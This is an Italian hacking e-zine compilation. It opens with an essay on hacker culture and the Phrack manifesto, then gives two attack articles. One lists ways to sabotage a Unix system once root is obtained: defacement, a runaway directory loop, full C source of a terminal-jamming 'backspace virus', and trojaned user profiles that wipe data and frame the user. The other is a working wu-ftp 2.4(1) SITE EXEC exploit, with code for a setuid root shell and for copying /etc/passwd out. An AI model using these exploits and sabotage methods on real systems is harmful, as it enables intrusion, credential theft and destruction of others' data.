nelle banche dati altrui facendosi beffe dei sistemi di sicurezza. In realta' il termine piu' corretto per identificare questo gruppo di
individui e' crackers, ma spesso i due termini vengono confusi. Ecco quanto RMS (un vero hacker) scriveva al Wall Street Journal
relativamente all'uso improprio che i giornalisti fanno del termine
---
Spettbile Editore
Le scrivo questa lettera non perche' sia pubblicata, tuttavia - se crede - potra' pubblicarla. E' indirizzata specificamente a Lei, l'Editore, e
non ai suoi lettori.
Io sono un hacker. Cio' significa che amo giocare con i computer -- lavorarci, apprendere il loro funzionamento, e scrivere programmi
ben fatti. Io non sono un cracker; Non passo il tempo a violare la sicurezza dei computer.
Non c'e' niente di cui vergognarsi nel hacking che faccio. Ma quando dico alla gente che sono un hacker, la gente pensa che sto
ammettendo una nefandezza -- perche' i giornali come il vostro usano erroneamente la parola "hacker", dando l'impressione che
significhi "security breaker" e niente piu' Lei procura agli hackers una brutta fama.
La cosa piu' triste e' che questo atteggiamento viene perpetuato deliberatamente.
I Vostri reporter conoscono la differenza tra "hacker" e "security breaker". Loro sanno come distinguere ma voi non lo consentite! Voi
insistete ad usare "hacker" in senso peggiorativo. Quando i reporter usano un'altra parola, voi la cambiate.
Quando i reporter cercano di spiegare l'altro significato, voi tagliate. Ovviamente, avete un motivo. Dite che i lettori si sono abitiuati a
usare il significato negativo della parola e quindi non si puo' piu' cambiarlo. Beh, non e' possibile cancellare gli errori del passato; ma
non c'e' nessuna scusa per ripeterli domani.
Se io fossi quello che voi chiamate un "hacker", a questo punto cercherei di forzare i vostri computer e di mandarli in crash. ma sono un
hacker, non un cracker. Io non faccio questo genere di cose!
Ho abbastanza computer con cui giocare a casa e al lavoro; Io non ho bisogno dei vostri.
Inoltre non e' mia abitudine rispondere agli insulti con la violenza. La mia risposta e' questa lettera.
Dovete delle scuse agli hackers; ma piu' di cio', ci dovete del normale rispetto.
---- EOF
Gli antenati dei crackers erano i phone phreakers, che alla fine degli anni Settanta, in lotta contro le compagnie dei telefoni, imitavano i
segnali d'accesso delle reti telefoniche per telefonare gratis in tutto il mondo.
Tra questi il piu' famoso e' John Draper (alias Captain Crunch) inventore della blue-box.
Con l'arrivo dei primi personal computers, ecco nascere una generazione di ragazzini terribili (come l'eroe del film War Games), per i
quali non c'è codice segreto che tenga. Alcuni come Robin Tappan Morris, inventore di un terribile virus che nel 1988 distrusse le banche
dati di varie università americane, sono geniali sperimentatori, travolti dai loro stessi esperimenti. Altri, come il tedesco "Pengo", che
rubava informazioni segrete e le vendeva ai sovietici, usano la loro attività per pratici scopi criminali.
5. ESISTE UNA ORGANIZZAZIONE?
Durante il DefCon 5 (1997) Ira Winkler (direttore del NCSA) ha dato la seguente descrizione dell'universo underground (cioe' di come è
strutturata la comunità degli hackers/crackers a livello mondiale).
Si stima che a livello mondiale esistano all'incirca 200/300 individui che conoscono a fondo il funzionamento dei kernel dei principali
sistemi operativi, dello stack TCP/IP, dei router, e dei firewall e che vi lavorano attivamente sviluppando programmi in C in grado di
testare eventuali problemi di sicurezza e di creare le opportune patch per superare questi limiti.
Questi programmatori sono in continuo contatto tra loro, si scambiano informazioni, comunicano le loro scoperte ad istituzoni quali il
CERT (=Computer Emergency Responce Team) e producono documentazione molto tecnica e che contiene le informazioni essenziali.
Attorno a questi 200 guru gravitano circa 2000 programmatori e system administrator (skilled people) che sono ingrado di capire ciò che
dicono i 200. Questo gruppo di persone analizza la documentazione prodotta dai 200, provano i programmi da loro sviluppati su altri
sistemi operativi, li migliorano, scrivono a loro volta altri programmi più semplici da usare e producono della documentazione
decisamente più articolata che spiega in dettaglio qual'e' il problema che esisteva, dimostra come sfruttare il bug a proprio vantaggio e
fornisce una soluzione oppure indica la direzione nella quale lavorare per poterlo risolvere. Generalmente i programmi sviluppati a
questo e al precedente livello sono distribuiti gratuitamente (nel miglior spirito hackers) e possono essere usati sia per testare i propri
sistemi e migliorarli, che per penetrare in sistemi altrui. L'uso che verrà fatto del programma dipende dallo spirito e dall'etica del
singolo individuo. In generale (a qualsiasi livello) l'unica legge universalmente accettata da tutti gli hackers è il diritto alla libera
circolazione delle idee.
L'hacker è alla continua ricerca dela conoscenza... per questo motivo, egli prova, scrive codice, raccoglie e scambia diligententemente
informazioni al fine di conoscere tutto ciò che è possibile sapere.
Attorno a questi 2000 programmatori esite un vasto gruppo (tra i 20 e i 75 mila) che Winkler definisce clue-less (incapaci) che sfruttano
le informazioni e i prodotti diffusi dall'anello precedente per propri fini personali. Si tratta di persone con discrete conoscenze dei
sistemi operativi ma con scarse doti di programmatori.
Lo scenario però, afferma Winkler, e' ancora più complicato. Fino ad ora abbiamo descritto ciò che è presente sullo scenario pubblico.
La sicurezza informatica, la penetrazione in sistemi informativi aziendali e/o governativi, tuttavia, interessa anche ad altre realtà le
agenzie governative, i servizi sergreti, l'esercito e le ambasciate (FBI, CIA, NSA, NATO, NASA, i servizi segreti israeliani, il Japanese
immigration plan...)
hanno anche
loro un pool di super esperti in grado di indagare, rivolvere e sfruttare a loro piacimento i bug dei sistemi informativi. Questo staff
attinge al materiale di pubblico dominio e produce a sua volta documentazione e software che può essere usato da un gruppo più
ampio di persone all'interno della stessa organizzazione allo scopo di portare a termine le proprie missioni. Per rendere più difficile
risalire a chi ha compiuto determinate azioni, anche queste organizzazioni rimettono in circolo il materiale prodotto se più persone sono
in grado di penetrare in un sistema utilizzando gli stessi strumenti sarà difficile attribuire ad una particolare ambasciata o governo una
determinata azione! Un esempio eclatante di come i servizi segreti interagiscono con la comunità underground è dato da due notissime
BBS del passato la QSD francese e la HCK tedesca. Si trattava di BBS presso le quali erano soliti incontrarsi e scambiarsi programmi e
informazioni i più noti hacker europei.. ebbene alcuni di loro cercando di craccare i sistemi hanno scoperto che a gestire queste bance
dati erano proprio i servizi segreti dei due paesi!
L'ultimo tassello che manca per rendere completo lo scenario è il contributo apportato dalla crimilità organizzata. La Yakuza, la mafia
cinese, la mafia russa, i gruppi criminali medio orientali e anche quelli nostrani dispongono di un gruppo di esperti che elaborano le
tecniche con cui gli esecutori possono compiere le loro azioni.
Anche loro
hanno tutto l'interesse ad attingere al patrimonio pubblico e a diffondere le tecniche da loro implementate per rendere difficile risalire ai
veri esecutori.
5. CYBERPUNKS
Il movimento internazionale degli hacker e del nuovo underground tecnologico ha issato volentieri la bandiera cyberpunk, riconoscendo
in Gibson, Sterling e compagni non solo una piacevole lettura, ma anche l'indicazione trasversale di modalità di comportamento che già
maturavano nella società postindustriale, ma a cui questi scrittori davano visibilità e nuove possibilità di riflessione e di
autorappresentazione. Non a caso Sterling, che del cyberpunk letterario è stato il teorico, (in un intervista rilasciata a Science-Fiction
Studies e pubblicata nel 1992) affermava Oggi i riferimenti al cyberpunk come fenomeno letterario sono sempre meno rispetto all'uso
che si fa del termine come sinonimo di criminale del computer. Fra un paio di anni nei cataloghi delle biblioteche universitarie alla voce
cyberpunk si troveranno solo libri sui crimini informatici.
La maggior parte degli hacker si considera un ribelle high-tech, come i software cowboys del cyberpunk, per i quali la lotta contro il
sistema e' un fine in se stessa, una filosofia di vita. Gli hacker raccolgono nelle loro fila molti degli operatori delle prime comunità
virtuali degli anni '70, che, radicalmente idealisti e sostenitori della politica della libera circolazione delle idee, ma non solo di quelle
(riproducono illegalmente programmi commerciali e giochi protetti da copyright (vedi Italian Crackdown) e le immettono nei circuiti di
distribuzione (BBS), effettuano reverse engineering su programmi protetti dalla copia per eliminarne la protezione rendendone così
possibile la distribuzione, distribuiscono informazioni su funzioni non documentate ...), hanno attirato recentemente l'attenzione della
stampa e talvolta (per questa loro utopica filosofia) anche la simpatia dell'opinione pubblica.
6. MANIFESTO
Di seguito riporto un estratto da un vivido manifesto hacker, ricavato dal volume uno, numero 7, phile 3 di Phrack - una delle più note
riviste elettroniche underground (traduzione tratta da Giro di vite contro gli hacker - vedi bibliografia)
OGGI HO FATTO UNA SCOPERTA.
HO TROVATO UN COMPUTER.
ASPETTA UN ATTIMO, CHE GANZO. FA QUELLO CHE VOGLIO CHE FACCIA.
SE FA UN ERRORE, È PERCHÉ SONO IO CHE HO COMBINATO UN GUAIO. NON PERCHÉ NON GLI PIACCIO...
E POI È SUCCESSO...
SI È APERTA UNA PORTA SUL MONDO...
CORRENDO ATTRAVERSO LE LINEE TELEFONICHE COME L'EROINA NELLE VENE DI UN DROGATO, VIENE MANDATO FUORI UN IMPULSO
ELETTRONICO, VIENE RICERCATO UN RIFUGIO DALLE INCOMPETENZE QUOTIDIANE...
SI TROVA UN BOLLETTINO.
QUI...
QUESTA È LA MIA PATRIA...
QUI CONOSCO TUTTI... ANCHE SE NON LI HO MAI INCONTRATI, NON HO MAI PARLATO CON LORO, E MAGARI NON LI SENTIRÒ MAI PIÙ..
VI CONOSCO TUTTI... QUESTO ORA È IL NOSTRO MONDO... IL MONDO DELL'ELETTRONE E DEL COMMUTATORE, LA BELLEZZA DEL BAUD.
FACCIAMO USO DI UN SERVIZIO GIÀ ESISTENTE, SENZA PAGARE PER QUELLO CHE POTREBBE ESSERE A BUON PREZZO COME L'ACQUA SE
NON FOSSE GESTITO DA AVIDI PROFITTATORI.
E VOI CI CHIAMATE CRIMINALI.
NOI ESPLORIAMO...
E VOI CI CHIAMATE CRIMINALI...
NOI CERCHIAMO LA CONOSCENZA...
E VOI CI CHIAMATE CRIMINALI.
NOI ESISTIAMO SENZA COLORE DELLA PELLE, SENZA NAZIONALITÀ, SENZA PREGIUDIZI RELIGIOSI... E VOI CI CHIAMATE CRIMINALI.
VOI COSTRUITE BOMBE ATOMICHE, DICHIARATE GUERRA, UCCIDETE, SPERGIURATE E CI MENTITE E CERCATE DI FARCI CREDERE CHE È
PER IL NOSTRO BENE, EPPURE SIAMO NOI I CRIMINALI.
SI, IO SONO UN CRIMINALE.
LA MIA COLPA È QUELLA DELLA CURIOSITÀ, LA MIA COLPA È QUELLA DI GIUDICARE LA GENTE IN BASE A QUELLO CHE DICE E CHE PENSA,
NON IN BASE AL SUO ASPETTO. LA MIA COLPA È QUELLA DI ESSERE PIÙ FURBO DI VOI E, PER QUESTO, NON POTRETE MAI PERDONARMI.
7. ALTRI LINK UTILI
The Jargon File - http://www.tuxedo.org/~esr/jargon/html/index.html
The Electronic Frontier Foundation - http://www.eff.org/
Phrack - http://www.phrack.com/
La homepage dell'autore - http://www.pippo.com/
A. INTRODUZIONE A GNU
GNU sta per Gnu is Not Unix.
Si tratta di un progetto che e' nato per sostituire le utility proprietarie dei sistemi Unix. Questi programmi sono gratuiti e vengono
distribuiti (con tanto di codice sorgente) insieme al sistema operativo con una particolare licenza (chiamata GNU Public License) che
autorizza chiunque a modificare i sorgenti e ridistribuire il codice modificato a patto di farlo utilizzando lo stesso tipo di licenza.
Col tempo molti altri programmi hanno adottato questo tipo di filosofia rendendo possibile lo sviluppo di sistemi operativi quali Linux e
FreeBSD, ma anche il miglioramento di tutti gli altri sistemi operativi proprietari.
Per maggiori informazioni a riguardo
http://www.fsf.org/
http://www.opensource.org/
http://www.linux.org
http://www.freebsd.org
B. LICENZA D'USO
Questo documento realizzato da Marco Iannacone (ianna@pippo.com) viene rilasciato secondo la licenza GNU General Public License
(GPL o copyleft) versione 2 della Free Software Foundation.
Chiunque e' autorizzato a distribuire copie elettroniche o cartacee del presente documento, allegarlo a raccolte, CD-ROM o programmi,
a patto di citare la fonte da cui e' stato tratto. Dato che il documento viene distribuito gratuitamente l'autore non si assume NESSUNA
responsabilita' per eventuali errori o inesattezze che possano essere presenti.
Le considerazioni espresse all'interno del documento devono essere considerate opinioni personali dell'autore e NON dogmi assoluti.
C. BIBLIOGRAFIA
Gibson William, Neuromancer, Ace Books, New York, 1984
[tr.it.Neuromante, Editrice Nord, Milano, 1991, pag.261,£8.000]
- Count Zero, Ace Books, New York, 1987
[tr.it.Giù nel ciberspazio, Arnoldo Mondadori Editori, Milano, 1990]
- Virtual Light, 1993
[tr.it.Mirrorshades, Arnoldo Mondadori Editori, Milano, 1994, pag 262, £30.000]
Sterling Bruce, Prefazione in William Gibson Burning Chrome,ix - xii, Ace Books, New York, 1986
- Prefazione in Mirrorshades (a cura di) Ace books, New York, 1988
[tr.it.Mirrorshades, Bompiani, Milano, 1994, pag 311, £13.000]
- The Hacker crackdown, 1992
[tr.it.Giro di vite contro gli Hacker, Shake, Milano, 1993, pag 253, £18.000]
Steven Levy, Hackers: Heroes of the Computer Revolution, Ed. Anchor Press/Doubleday, 1984
[tr.it. Hackers, Edizioni Shake, 1996, pag.461, £ 33.000]
Neal Stephenson, In the Beginning... was the command line, Avon Sociology Business, 1999, pag. 151, $ 10
Sherry Turkle, Life on the screen, Simon & Shuster, New York, 1995, pag. 327 DECODER - Rivista internazionale underground
EFF's Guide to the Internet, v. 2.3 Copyright 1993, 1994 Electronic Frontier Foundation
[e la sua traduzione a cura dell'associazione LIBER LIBER]
The Sordid Hystory of UNIX da Unix System Administration Handbook - second edition, E. Nemeth, G. Snyder, S. Seebass, T.R. Hein,
Printice Hall, 1995, pag. 778
W. Grotophorst, InfoPop/Windows 1.01, GMUtant Software, email: wallyg@fen1.gmu.edu, 8/6/93
- Le FAQ di USENET
- FAQ e HOW-TO di Linux
ÈÍHACKiNGÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ COME FAR SUICIDARE IL ROOT ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Allora premetto che quello che scrivo l'ho spesso provato sul mio povero linux;
non mi permetterei mai di modificare dati in un sito almeno che non contengano
il mio ip. Se combinate qualche cazzata su un sistema unix che non sia il
vostro e soprattutto se non avete avuto il motivo per farlo, saro' il primo a
sperare che tutto vi vada a puttane nei prossimi 2 - 3 anni trascorsi dietro
alle sbarre sperando che il vostro compagno di cella non ve lo metta in culo.
Questo articolo e' la versione finale di una serie di altri che avevo scritto
senza mai completarli.
IDIOTI E MENO IDIOTI ...
La cosa piu' idiota che un ragazzino poco maturo possa fare in un sistema unix
e' prendere accesso root e fare rm /etc/passwd, anche perche' se fate solo
questo senza cancellare il resto preparatevi ad avere una bella visita a casa
(e cominciate a sperare che il vostro solito compagno di cella, i cui reati
saranno ben piu' gravi dei vostri, vi giudichi abbastanza brutto per diventare
la sua ragazza :)
Ok sono stato chiaro, ora posso cominciare a fare il serio o almeno provarci.
Se utilizzerete uno di questi metodi probabilmente non vi interessera' molto
tenere accesso al sistema o se non altro il vostro scopo non sara' quello di
non farvi notare.
/etc/motd
Qualcuno di voi, se gira su irc dovrebbe gia' sapere cos'e' il motd, ovvero il
Message Of The Day (non fatemelo tradurre :)
La domanda e': cosa ci scrivo?
Quello che vuoi: "Siete tutti idioti", "Uhmmm pensavo che tutti potessero
entrare, cosi' ho scritto root e la password e sono entrato...", "Oggi siete
tutti stati fottuti da un hacker" .....
Questo e' forse il metodo piu' bello per farsi notare :)
Se poi il vostro scopo e' quello di diventare famosi, non vi accontenterete
soltanto che gli utenti del sistema vi conoscano, ma pure chiunque si colleghi
alla pagina web e cosi' dovrete scaricarle (fate con calma :) modificarle per
poi ributtarle dentro (sempre che abbiate i permessi per farlo).
Ormai questo e' diventato un sport molto praticato vedi per esempio il sito
CIA che e' diventato un bel "Central Stupidity Agency" (eheh la SHA e' sempre
la migliore =) e altre modifiche molto carine .... Questo scherzetto fa
completamente incazzare il root, infatti lo fa passare agli occhi di tutti
come un grandissimo coglione.
/etc/issue
Volete modificare le scritte prima della fase di loggaggio da parte di un
utente? Ok allora prendete questo bel file e fate di lui cosa volete ....
Consiglio: spacciate il sistema come un altro che ne so mettete la scritta
SunOS al posto di Linux, magari il root sara' convinto di aver cambiato
sistema operativo ;)
welcome.msg
Questo e' il file che vedi quando ti logghi in un sistema via ftp, anche qui
vale la solita regola: scriverci quello che si vuole :)
PRESENZA ALIENA
Beh questa e' la cosa piu' bella che si possa fare agli utenti online:
mandargli messaggi senza far capire da dove vengono (non su tutti i sys e'
possibile farlo senza essere root)
echo "Sono un alieno, questa notte ti vengo a prendere" >/dev/ttyXX
oppure
cat nomefile >/dev/ttyXX
Se proprio volete far impazzire l'utente e costringerlo ad abbandonare il sys
fate un cat di un file binario.
Se avete la fortuna di trovare il root fategli un cat del file delle passwd,
personalmente penso che ci resti un po' male ;)
BUG? SI GRAZIE
Vi sembra che il sistema sia tutto sommato abbastanza sicuro? Beh perche' non
renderlo piu' insicuro? Cominciate a risvegliare vecchi bug, se c'e' poi del
software che vi piace tanto, ma manca nel sistema, vi ricordo che siete
amministratori :)
RETE VELOCE??? RALLENTIAMOLA!
Scrivi dalla shell:
while : : ; do
> mkdir "fuck"
> chdir "fuck"
done
(e' facile intuire cosa combinate con queste poche righe, semplicemente date
il via ad un ciclo infinito che non fa altro che creare directory una dentro
l'altra)
UN VECCHIO AMICO DI PIGPEN OVVERO L'MBS
(Anche se non funziona su tutti i sys vi puo' far comodo un programma che non
permetta agli altri utenti di scrivere nessun comando ... )
------------------CUT HERE--------------------
#include <stdio.h>
#include <sys/types.h>
#include <utmp.h>
#include <fcntl.h>
#include <signal.h>
/*
MBS - Mass BackSpace Virus!! v2.2 Deluxe+
(c) 1990 - Sir Hackalot
PhaZeSOFT Ltd.
*/
char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
int maxitem = 5; /* Should be total # of immune dudes */
int truefalse = 0;
int warn[10],bad;
char full_tty[15], text[160], kstr[80];
FILE *to_tty, *strm;
struct utmp u;
void kmes(fmt,boo)
char *fmt;
int boo;
{
if (boo != 0) {
printf("MBS_KERN: ");
printf("%s",fmt);
}
if (boo == 0) {
sprintf(full_tty,"/dev/%s",u.ut_line);
to_tty = fopen(full_tty,"w");
fprintf(to_tty,"MBS_KERN: %s",fmt);
fclose(to_tty);
}
}
void initit() { /* Initialize our little "kernel" */
int xxx = 0;
strcpy(ent[0],"technic");
strcpy(ent[1],"merlin");
strcpy(ent[2],"datawiz");
strcpy(ent[3],"par");
strcpy(ent[4],"Epsilon");
while (xxx < 11) {
warn[xxx] = 0;
xxx++;
}
kmes("Kernel Started.\n",1);
}
void warnem(wcnt) /* Notify all the immune people ... */
int wcnt;
{
if (bad == 0) { /* keep from dumping core to disk */
if (warn[wcnt] < 2) {
sprintf(kstr,"%s has started a backspace virus!\n",getlogin());
kmes(kstr,0);
warn[wcnt]++;
}
}
}
int checkent(uname) /* Check for immunity */
char *uname;
{
int cnt = 0;
truefalse = 0; /* assume NOT immune */
while (cnt < maxitem) {
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
truefalse = 1;
warn[cnt]++; /* increment warning variable */
warnem(cnt); /* warn him if we have not */
}
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
/* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
to intercept it, and notify use */
void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
}
main(argc,argv)
int argc;
char *argv[];
{
int prio,pid,isg,handle;
char buf[80];
char name[20],tty[20],time[20];
initit();
if (argc < 2) prio = 20;
if (argc == 2) prio = atoi(argv[1]);
if ((pid = fork()) > 0) {
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
printf("Another Fine PhaZeSOFT production\n");
printf("Thanks to The DataWizard for Testing this\n");
printf("Hello to The Conflict\n");
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
kmes(kstr,1);
exit(0); /* KILL MOTHER PID, return to Shell & go background */
}
nice(prio);
signal(SIGQUIT,sig_hand);
signal(SIGINT,sig_hand);
signal(SIGTERM,sig_hand);
/* That makes sure you HAVE to do a -9 or -10 to kill this thing.
Sometimes, hitting control-c will kill of background processes!
Add this line if you want it to continue after you hangup:
signal(SIGHUP,SIG_IGN);
doing it will have the same effect as using NOHUP to
to execute it. Get it? Nohup = no SIGHUP
*/
while(1) { /* "Kernel" Begins here and never ends */
handle = open("/etc/utmp",O_RDONLY);
while (read(handle,&u,sizeof(u)) != 0) {
bad = 0;
sprintf(full_tty,"/dev/%s",u.ut_line);
if (strcmp(u.ut_name,getlogin()) != 0) {
/* Fix: Below is a line that optimizes the hosing/immune process
It skips the utmp entry if it is not a user. If it is, it
checks for immunity, then comes back. This is alot faster
and does not wear down cpu time/power */
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
else isg = 1;
if (isg != 1) {
if((to_tty = fopen(full_tty,"w")) == NULL) {
bad = 1;
}
if (bad == 0) {
fprintf (to_tty, "\b\b\b");
fflush (to_tty);
}
fclose(to_tty);
}
}
}
close (handle);
}
}
------------------CUT HERE--------------------
IL MIO SOGNO ERA AMMINISTRARE UNA RETE
(Queste cose fatele soltanto se avete appena saputo di avere l'AIDS e che cmq
dovete crepare)
Ok se questa era la vostra aspirazione, cominciate a prendere in
considerazione i files come per esempio:
/etc/inetd.conf
/etc/services
/etc/ftpaccess
/etc/syslog.conf
/etc/hosts.equiv
e rifate la rete come volete (uh che dite se ne accorgeranno ???)
Immaginate di avere accesso come root su piu' di un sistema ... e di creare
una rete per voi con tutti questi sistemi, non lo trovate eccitante ? ;)
TELEFONATA FASULLA ALL'ENNESIMA POTENZA (David Troup insegna ;)
Questo scherzetto consiste nel mettere uno spazio prima di ogni password e
vedere quanto tempo ci impiega il root a trovare il problema.
COMANDO CU (Il mio preferito!)
Se siete in un sistema unix dove e' possibile far chiamate con il comando cu,
mettete su un cron che chiama un numero (possibilmente molto lontano) ogni
tot. di minuti.
Certo che se fate una cosa del genere siete proprio bastardi :)
I PROFILI UTENTI
Avete mai pensato a modificare il profilo di un utente in modo tale che quando
entra (naturalmente viene loggato con il suo ip 8) ottiene i privilegi root e
cancella tutto ... ?
O magari manda una mail di insulti al root :)
In quest'ultimo caso potete usufruire di un file di copia del profilo normale
che sovrascrivera' quello che contiene i comandi malefici dopo che sono stati
eseguiti :)
Se conoscete unix avete capito che e' facilissimo farlo e anche abbastanza
sicuro (ricordatevi oltre che a coprire le tracce, di cambiare la data del
profile con il comando touch).
Se farete tutto quello che vi ho detto il root si incazzera' con l'utente a
cui avete modificato il profilo e il codice che ha generato il casino non
sara' piu' recuperabile (sembrera' che l'utente abbia fatto il tutto con le
sue manine :)
Ok queste sono soltanto un po' di idee, naturalmente se fate una cosa del
genere siete dei gran masochisti oppure semplicemente pazzi e bastardi.
Comunque penso che la fantasia vada d'accordo con la pazzia, quindi se
possedete entrambe le cose questo articolo non vi serve ad un cazzo...
Concludo con un pezzo musicale dedicato a chi leggera' questa guida e pensera'
male della scena underground:
"Some folks trust to reason,
Other trust to might.
I don't trust to nothin'
But I know it come out right.
Say It once again now.
Whoa, I hope you'll understand.
When it's done and over, Lord,
A man is just a man.
Playing, playing in the band.
Daybreak, daybreak on the land.
Some folks look for answers,
Other look for fights.
Some folks up in treetops
Just to look to see the sights.
I can tell your future,
Whoa, just look what's in your hand.
BUT I CAN'T STOP FOR NOTHIN'
I'M JUST PLAYING IN THE BAND." ;)
Playing in the band/G.DEAD
Grazie pIGpEN
WU-FTP 2.4(1) EXPLOIT
Holaga,premetto he questo articolo non lo ho scritto io, ma lo ho trovato
modificato, dato che lo trovavo interessante lo ho inserito nella rivista.Non conosco
l'autore ufficiale, se si facesse vivo mi farebbe un piacere!!!!! :)
Scrivo questo articolo non perche' io pensi che tutti voi non
conosciate il bug che c'e' nel wu-ftp 2.4(1), ma perche' mi sono rotto le
palle di sentir dire che e' un exploit che si puo' usare solo da locale...
BALLE!!!!!!!!! Se ci sono certe condizioni, il bug del wu-ftp 2.4(1) puo'
essere utilizzato anche per ottenere root da remoto!!!!!
Vediamo un po' come si fa:
Iniziamo con la versione "normale", cioe' quella che si trova da tutte le
parti, sul wu-ftp 2.4(1) bug.
Allora, come prima cosa, create un programmino che copi la shell nella
directory tmp (o dove vi pare) e che la renda eseguibile da chiunque, poi
compilatelo nel sistema che volete hackerare.
Il programmino potrebbe essere questo:
shell.c
-----------tagliate qui------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
system("chown root /tmp/.sh");
system("chmod 4755 /tmp/.sh");
system("chmod +s /tmp/.sh");
}
-----------tagliate qui------------
Quindi, collegatevi con ftp al vostro sito e loggatevi con il vostro user e
passwd...
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)
ready.
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
Quindi scrivete:
ftp> quote site exec bash -c id
Se vi risponde qualche cosa di questo tipo vuole dire che e' buggato:
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200 (end of 'bash -c id')
Se e' buggato non dovete fare altro che scrivere:
ftp> quote site exec bash -c /la/tua/home/dir/shell
200-bash -c /la/tua/home/dir/shell
200 (end of 'bash -c /la/tua/home/dir/shell')
ftp> quit
221 Goodbye.
Per avere nella dir tmp la shell di root.
OK, ricapitolando, questo bug e' "etichettato" come compromettente solo
per locale per 2 motivi:
1) Vi ci vuole un account per collegarvi ed eseguire la shell nella dir /tmp.
2) Dovete compilare il programmino sul sistema che volete hackerare.
Ma a tutto questo si puo' ovviare :)
Innanzitutto, il sistema da attaccare deve concedere l'anonymous login per
l'ftp, cosi' potete loggarvici dentro e vedere se e' buggato.
Poi dovete vedere se il vostro bersaglio ha una dir scrivibile (in genere
/incoming)
Poi, dovete vedere in che dir del sistema remoto e' posto l'ftp
/home/ftp per Linux
/var/ftp oppure
/etc/ftp per gli altri
Quindi dovere modificare a seconda delle vostre esigenze il programmino
seguente, compilarlo e inviarlo nella directory scrivibile del vostro sistema
da attaccare:
-----------tagliate qui------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cp /etc/passwd /home/ftp/incoming/h");
system("chmod 755 /home/ftp/incoming/h");
}
-----------tagliate qui------------
Poi con la maniera descritta sopra lo fate eseguire dal Wu-ftp, e vi ritrovate
con il file h che contiene le passwd del sistema.
N.B.: Ricordatevi di cambiare il percorso /etc/passwd con il percorso del
vostro file delle passwd ;)
Quindi non avete altro da fare che scaricarlo e crackare qualche account per
poi collegarvi al sistema e sfruttare nuovamente il bug di wu-ftp (questa
volta nella maniera classica ;) per diventare root.
Naturalmente ci puo' essere qualche problema utilizzando questo metodo perche'
il programma gia' compilato da voi e uploadato sul sistema bersaglio puo'
non funzionare, inutile dire che per cercare di ovviare a questo inconveniente
dovete cercare di compilare il suddetto programmino su un sistema che e' il
piu' possibile simile a quello che provate ad hackerare.
Un altro problemino e' che nella dir /incoming ci rimane il file h, che
contiene il file delle passwd del sistema, e quindi se il sysadm lo vede puo'
cominciare a sospettare qualche cosa.....
Pero', se crackate subito qualche account e poi diventate root non ci sono
problemi, lo togliete subito. Se pero' le passwd sono difficili da crackare
e vedete che per trovare un account vi ci vuole piu' del previsto (cosa
parecchio, ma parecchio rara perche' se un sito ha il bug del wu-ftp vuol dire
che il livello di sicurezza non e' molto alto) basta che vi compiliate un altro
programmino che toglie h e tutti i prog che avete inviato dalla dir /incoming
e lo facciate eseguire sempre con il wu-ftp.
Non sto a mettere un esempio del programmino perche' non ho voglia e perche'
penso che se non siete capaci di farlo da soli e' meglio che non diveniate
root su qualche sistema :)
Cmq, se proprio ci tenete a non lasciare momentaneamente file compromettenti
nella dir /incoming del sito che attaccate, spediteci questo programmino al
posto di quello precedente (compilato naturalmente ;) che, invece di copiare
tutto il contenuto del file delle passwd, lo mostra.
-----------tagliate qui-----------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
seteuid(0);
system("cat /etc/passwd");
}
-----------tagliate qui-----------
Pero' il problema principale del metodo descritto qui sopra e' un altro ....
Per capirlo bene e' necessario spiegare un po' meglio come funge l'exploit
descritto sopra. Innanzitutto il bug sta nel fatto che il site exec ha
(di default) come PATH di esecuzione /bin per gli utenti registrati, (quindi
consente di fare praticamente tutto) e non controlla il reale uid e gid di chi
esegue il comando prima di farlo, quindi praticamente e' come se passaste i
comandi come root.
Il fatto pero' e' che quando vi collegate come anonymous vi prende come PATH
di esecuzione non /bin ma /home/ftp/bin (nel caso di linux), che in genere
e' una dir non scrivibile e che non contiene programmi che possono servire come
ad esempio la bash.
Quindi a meno di settaggi clamorosi della dir /home/ftp/bin/ come ad esempio
la capacita' di poterci uploadare roba, oppure di contenere la shell, se fate
il SITE EXEC bash -c id non otterrete nulla.
Comunque, si puo' sempre ovviare a questo e sfondare da remoto, se ci sono
certe condizioni:
1) la dir /home/ftp/bin contiene il comando tar
2) ho una dir scrivibile dove mettere file
3) posso fare un site chmod
Funziona cosi': Mi faccio un programmino che fa un seteuid(0), chiama
chmod(0755, "/home/ftp/bin") e copia lo std input nello std output.
Poi lo inviate nella dir scrivibile insieme a dei file compressi con il tar che
contengono una shell linkata staticamente (se no quando la eseguite con il site
exec non va perche' cerca i vari file /lib/lib.so etc etc) e i programmi di cui
avete bisogno.
Poi scrivete:
site exec tar --use-compress-program /incoming/hack -xf /incoming/programmi_miei.tar
Questo dovrebbe estrarre i vostri file nella directory /home/ftp/bin
consentendovi cosi' dopo di chiamare la shell che avete messo in
programmi_miei.tar e di utilizzare il site exec con quella shell per lanciare i
vari programmini presentati sopra per prendervi il file delle passwd.
Un grande CIAO a tutti
FLAT,USI E ABUSI
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
DISCLAIMER
Quello che riporterò in questo testo,è una vera truffa verso provider italiani.
